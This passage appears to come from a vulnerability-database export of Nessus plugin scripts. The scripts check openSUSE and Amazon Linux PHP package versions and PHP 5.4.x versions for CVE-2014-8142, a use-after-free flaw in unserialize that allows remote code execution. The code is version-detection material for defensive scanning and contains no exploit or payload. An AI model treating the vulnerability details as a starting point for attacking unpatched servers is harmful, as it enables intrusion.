reference:\"php5-posix-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debugsource-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-devel-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pear-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-debuginfo-5.6.1-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 5.4.x installed on the\nremote host is prior to 5.4.36. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.", "modified": "2018-07-24T00:00:00", "published": "2015-01-02T00:00:00", "id": "PHP_5_4_36.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80330", "title": "PHP 5.4.x < 5.4.36 'process_nested_data' RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80330);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n\n script_name(english:\"PHP 5.4.x < 5.4.36 'process_nested_data' RCE\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.4.x installed on the\nremote host is prior to 5.4.36. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.4.36\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68594\");\n # https://bugzilla.redhat.com/show_bug.cgi?id=1175718\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88c4ed71\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.4.36 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.([0-9]|[12][0-9]|3[0-5])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.4.36' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:34", "bulletinFamily": "scanner", "description": "Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .", "modified": "2018-04-18T00:00:00", "published": "2015-01-09T00:00:00", "id": "ALA_ALAS-2015-464.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80415", "title": "Amazon Linux AMI : php55 (ALAS-2015-464)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-464.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80415);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_xref(name:\"ALAS\", value:\"2015-464\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-464)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-464.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 